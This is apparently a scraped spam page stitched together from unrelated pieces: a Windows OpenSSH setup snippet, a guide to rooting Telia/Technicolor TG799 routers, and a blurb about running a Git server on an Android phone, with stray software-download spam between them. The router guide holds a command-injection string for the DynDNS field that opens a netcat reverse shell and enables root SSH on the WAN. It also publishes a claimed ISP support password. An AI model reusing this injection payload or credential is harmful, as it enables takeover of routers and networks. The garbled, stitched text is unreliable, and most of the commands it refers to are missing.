Ssh Copy 17 03 1 Download Free

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Website for this place can be found here

Name: OpenSSH.Server0.0.1.0 State: NotPresent. Looks like I have the OpenSSH client stuff but not the server. I can SSH from Windows, but not to. Sparkle 2 5 6. I'll add it with a similar command with the super weirdo but apparently necessary version thing at the end: Add-WindowsCapability -Online -Name OpenSSH.Server0.0.1.0. The basic idea is to create a key pair on the client and copy the public key to the server into an authorized keys file. See how to set up public key authentication. Don't forget to establish proper SSH key management pratices.

Very Important Notice 2019-11-15:

It is possible to get root access on 17.2.405 version if you are using a MiTM attack, but its a mess so read below:

If you have root access (telia still sending out devices with version 17.03) so the first thing you really must do is to edit the dropbear file on bank 2, otherwise you will be locked out when they pushing the firmware to 17.04 and then you are pretty lost unless you know how you can setup a MGMT network and gain root access this way.

Also for disable so your router wont get upgraded you can type below command ASAP you have connected to shell:

For get all info and settings from your device (Thanks to @LuKePicci for this as well)

…… and some extremely much more stuff will be printed.

For get the CSFR code if you are building some kind of scripts the easiest way to get it is by visit: A better finder rename 10 17 download free.

Notice: This wiki is for firmwares <17.2.0405. For get root access on 17.2.0405 you must downgrade your firmware via TFTP flashing and then you can follow this wiki, more info about how to downgrade your firmware can be found on this awesome wiki - Thanks to all who contribute, you know who you are - If you leeching the firmwares, then seed 24/7 for help others

For know wich firmware you need, see @LuKePicci comment here - I'm really grateful for your help here luke.

Telia - VANT-W firmwares can be downloaded from:

Telia - VANT-R firmwares can also be downloaded from:

Telia - VBNT-H firmwares can be downloaded from:

Telia - VDNT-O firmwares can be downloaded from:

Ommwriter 1 613. Commands must be executed on the router:

For upgrade firmware, you just have to type:

#### Get access to all cards on latest firmware:

Bonus from 2019-10-29. Since I have been blacklisted by Telia from getting new routers for free and they force me to pay full price if I want a new router I decided to share their secret password in plain-text. Telia's default password in plain-text is: ‘_T3L1a!SuPPor7' for all Technicolor routers - Enjoy!

If you want me host more firmwares just setup a FTP or something so I can leech them and I will host them for you, send an e-mail with info to

Alright guys, i have bricked my old TG799VAC-XTREME when i figured out how to generate the access key so I just got my new TG799 VAC Xtreme2 with version 17.2 Mint, ofc i have hacked this one aswell since i DO not want backdoors in my network.

I have not found any other tutorial how-to hack this version from technicolor in this way I have done it. Someone has to be the first on a new exploit and let everyone know what's really is an open door straight into your network and your digital life. This is nothing people just should say things like 'i do not care' cause this can really be abused if there is some blackhat hacker on the support or if someone just is curios about your life and has enough freetime . With TSHARK or WSHARK they can sniff ALL your traffic no matter what ppl say since the router is the last point in ‘almost' all home-networks. I exposing Telia again cause i see this as a REAL threat to our privacy…I had never questioned this if the providers had been straight and honest about what they actually have access to. I will expose every setting, every ip and every key i can found until they will remove the backdoors. Now im bored so let's start i really hate to write descs and the faster you get this information, the faster you can protect yourself from the backdoors.


The question is who has access to the logs from our router on the ip number you see in the picture below, why should they receive a lot of data from the router? They have gone so far so they storing logs when you start & restore the router, what are they doing with this data? This is really unpleasant and people really have no idea that things they do in their own home getting stored on a server in Stockholm / Telia. (whois the ip)


1) Please wait 20-30 seconds before you trying to ssh into your router

2) Connect to router: ‘ssh root@'

3) Default password: root

4) You have just hacked your router in 20 seconds. You also toke over root account from telia & technicolor devs.

Copy and paste all this stuff in dyndns field in webgui (edit ip):

::::::;nc 1337 -e /bin/sh;rm /etc/dropbear/*;uci delete dropbear.mgmt &> /dev/null;uci delete dropbear.mgmt.PasswordAuth &> /dev/null;uci delete dropbear.mgmt.RootPasswordAuth &> /dev/null;uci delete dropbear.mgmt.Port &> /dev/null ;uci delete dropbear.mgmt.Interfac e&> /dev/null;uci delete dropbear.mgmt.AllowedClientIPs &> /dev/null;uci delete dropbear.mgmt.enable &> /dev/null;uci delete dropbear.mgmt.IdleTimeout &> /dev/null ;uci set dropbear.wan=dropbear;uci set dropbear.wan.PasswordAuth='off';uci set dropbear.wan.RootPasswordAuth='on';uci set dropbear.wan.Port='22';uci set dropbear.wan.Interface='wan';uci set dropbear.wan.AllowedClientIPs='wanip';uci set dropbear.wan.IdleTimeout='3600';uci set dropbear.wan.enable='1';uci set dropbear.lan=dropbear;uci set dropbear.lan.PasswordAuth='on';uci set dropbear.lan.RootPasswordAuth='on';uci set dropbear.lan.Interface='lan';uci set dropbear.lan.enable='1';uci set dropbear.lan.IdleTimeout='3600';uci set dropbear.lan.Port='22';uci set web.uidefault.nsplink='';uci set system.config.export_plaintext='1';uci set system.config.export_unsigned='1';uci set system.config.import_plaintext='1';uci set system.config.import_unsigned='1';uci set clash.main_config=single_config;uci set clash.main_config.module_path='/usr/lib/lua/clash/modules';uci set clash.main_config.log_level='3';uci set;uci set'1';uci set'1';uci set'1';uci set'wuseman@thinkpad';uci set web.uidefault.upgradefw_role='admin';/etc/init.d/dropbear restart; uci commit


Let's begin. Fire up a terminal of any kind and just run the awesome netcat tool and listen on a port:

Go to the WAN Services and press SHOW ADVANCED. In username, password and domain field you need type the below command, after this is done just enable the dyndns. It wont matter wich hoster you choose just pick one, press save and just wait 4-5 seconds and you have just got full root access of your TG799VAC Xtreme 17.2 Mint, check preview video above if you do not understand.

You will see something similiar and if you see this then you got root access, type ls / for example:

Let us now allow SSH permanent, copy paste commands below:

When things gets broken for real as for example there is no space left and you can't even use rm -rf command then mtd will save you, run below command for a full factory reset:

If WEBGUI ever will get broken cause you fucked it up then reset router with ‘rtfd –all (same as press on reset button)'. If you want to keep files and just reset settings then use ‘rtfd –soft' instead.

Banner (our internet providers have given us an firmware with absolutely minimal features, fuck you!!)


When you have root access on your router you will be able to unlock rootfs_data and install a very powerful gui vs original from Telia thanks to Ansuel and other awesoem developers by below command:

Now go visit and you will see a brand new GUI interface. Default login: username: admin - password:admin

This is how it will look a like after you run the above command:

Stats view:

Telstra Extension:

This is an example for default setup with more lua cards:

Luci is another thing you will be able to install - Not supported in above package yet:

Do you look forward to upgrade your firmware without any third party software or without any backdoors from your internet provider? Great, i will show you how you will do this easier then ever.

Add Administrator user to be allowed to upgrade firmwware:

If you will try below command you will know how it feels to work for telia a support: ;)

Add your own user without any extra tools:

Add a new user with clash:

Create a user for minitrr064d


Install Required Packages: Configs - Network: Configs - Firewall:

Setup openvpn client:


With below setting you will be allowed to install packages from more repos:

Enable TFTP and flash your device with TFTP:

Setup a TFTP server on your Gentoo Linux pc:

Use TFTP to push firmware to tg799vac router:

Remove all phone settings:

Remove all iptv settings:

Got stuck with some packages that says error opening terminal? No worries - This is caused cause colors - Run below command to fix the xterm problem:

Run from scripts dir to whois all ip's that your isp added for various settings:

Mount root as read and write:

If you are lazy and want things sorted as i do, then run below command:

List product, serial, ssid prefix etc;

List all files where 'password=' is readable:

List all files where you can find your serial:


Some guys on openwrt forum claims that your webgui will be faster if you change some power settings (DO IT ON YOUR OWN RISK I HAVENT TRIED):

Change telia to admin in all lp files:

For users that miss vpn card in webgui, run below command (if this modal is missing then its under modals dir in this repo)

Setup your dns provider from commandline:

Setup local hostnames:

Give a device on your localnetwork a custom hostname:

Example 1 - Echo method Example 2 - UCI method.

Setup domain names:

Example 1 - Echo method Example 2 - UCI method


Example 1 - Echo method Example 2 - UCI method

Disable UPNP:

Environment settings:

List all URLs for your firmware that can be downloaded (wont work on telias firmware. Did you found the key? Please contact me then):

List network devices:

To get a fresh network configuration on your client system you can remove all IP addresses via:

Changing max sync speed on your modem:

Enable or Disable dnsmasq:

Enable or Disable network time server:

Check the current running dns with:

Edit nsplink to something else (where you get redirected when you click on the logo at top)

This will show all traffic on your router with netstat:

This will show all ip numbers connected to your router atm.

Capture traffic on all interfaces (add -i wl0 for include wifi):

Enable or Disable Content Sharing (Samba / DNLA)

Take control over mwan:

To view currently dhcp leases:

To view all ipv4 adresses from uci settings:

Print CPU info with clash:

Enable or Disable GUI: List ARP log: List all interfaces mac-addr:

Various settings:

Remove trafficmon settings: Send syslog to your own server instead of sending * to Telia (it's insane that they want all stuff they filtering as default)

Grab all filters from log.txt when you export this from diagnostic tab and then insert the lines in /etc/config/system to log everything on your syslog server:

Settings for systlog

On your syslog server then put this in /etc/syslog/syslog.conf to recieve all messages from your tg799 xtream router.

Here is a screenshot from the listening server with the config below:

Now restart system on your router and you should see * messages: Enable or Disable Time of Day ACL rules: For login with debug mode enabled, then please go to (Proably not possible but it is to try): Enable or Disable so your router wont restart if there is an segmentation fault in a user space program:

Just type below command for print the accesskey:

You can check the current running dns with

Enable or Disable Content Sharing (Samba / DNLA):

Ssh Free Download For Windows

To view currently dhcp leases:

Disable Time of Day ACL rules

To disable mobile card since there is no button, execute:

List installed packages:

List installed packages in a tree:




Ssh Copy 17 03 1 Download Free Version

Ruleset Target ( You will get even more stuff in webinterface after you run below commands ) Roles ( You will see new stuff on webinterface after you run below commands) Delete all telia internal rules: Remove telia from all roles: Remove all mobiled stuff (just copy and paste): Wanna have some fun? Edit all false to true and vice versa ;p DO THIS ON YOUR OWN RISK ( YOU HAVE BEEN WARNED )

Add admin to everything and remove superuser & telia:


Add a new new modal:

A minimal alias definition for a bridged interface might be:

For for a non-bridge interface

Use your tg799 router as a switch instead as router:

Here is my example for using all ports for local network and also wan port(5):

Using bridge mode with a dedicated PPPoE ethernet port:

Mirror Servers for openwrt:

Be careful with settings not provided by me! ;)



We love using Git for its superior version control. We often host our more advanced projects in a public Github repository. But the bulk of our little experiments are simply local repos. This is fine if you're always at home, but if we are away from home we find ourselves having to SSH into our server to copy over the Git files. [Andrew] found a way around this slightly awkward process. He used an old Android phone as a Git server.

This actually makes a lot of sense when you start to think about it. Most Android phone have a microSD card slot to provide a huge storage bin (the lack of this on the Nexus 4 is baffling) so you don't need to worry about running out of space. All of these devices have WiFi, making it easy to use them as an AP when there isn't any other WiFi around. And the web-connected nature of the device will make syncing your repo over the Internet a snap.

Most of the behind the scenes work is done using Debian packages. This provides a few issues which [Andrew] walks through one by one. We also like his pointers like using ‘noatime' on your EXTx file systems to avoid wear on the SD card.

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